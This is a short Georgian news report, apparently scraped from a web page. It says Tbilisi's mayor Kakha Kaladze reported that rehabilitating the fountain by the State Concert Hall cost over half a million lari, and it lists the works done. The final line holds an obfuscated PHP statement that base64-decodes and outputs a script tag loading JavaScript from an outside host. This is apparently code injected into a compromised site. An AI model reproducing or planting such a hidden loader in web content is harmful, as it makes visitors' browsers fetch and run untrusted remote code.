celsiusi
ავერსი შნაიდერი

 თბილისის სახელმწიფო საკონცერტო დარბაზის მიმდებარედ არსებული შადრევანს რეაბილიტაცია ნახევარ მილიონ ლარზე მეტი დაჯდა - ამის შესახებ დედაქალაქის მერმა, კახა კალაძემ მუნიციპალიტეტის მთავრობის სხდომაზე ისაუბრა.

მერის თქმით, სამუშაოები შადრევნის ისტორიული იერსახის შენარჩუნებას ითვალისწინებდა.

„ეკოსერვის ჯგუფმა“ თბილისის სახელმწიფო საკონცერტო დარბაზის მიმდებარედ, შადრევნის რეაბილიტაცია განახორციელა. სამუშაოები შადრევნის ისტორიული იერსახის შენარჩუნებას ითვალისწინებდა. რეაბილიტაციის ფარგლებში, სრულად განახლდა შადრევნის კედლის წყლის ფარდა, აუზი, ტუმბო-აგრეგატი, მართვის ოთახი და დამცლელი მილი; შეიცვალა შადრევნის კედლის ქვედა ფილები და მოპირკეთდა გრანიტით. მოეწყო განათებები, ამომფრქვევები და ელექტროსადენები.

სამუშაოების ღირებულებამ, დაახლოებით, ნახევარ მილიონ ლარზე მეტი შეადგინა. აღნიშნული ტერიტორია ჩვენ მთლიანად მოვაწესრიგეთ და დღეს, ყველანაირად კეთილმოწყობილია“, - განაცხადა კახა კალაძემ და დასძინა, რომ ტერიტორიაზე ასევე, განახლდა მიწისქვეშა გადასასვლელები.

424
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");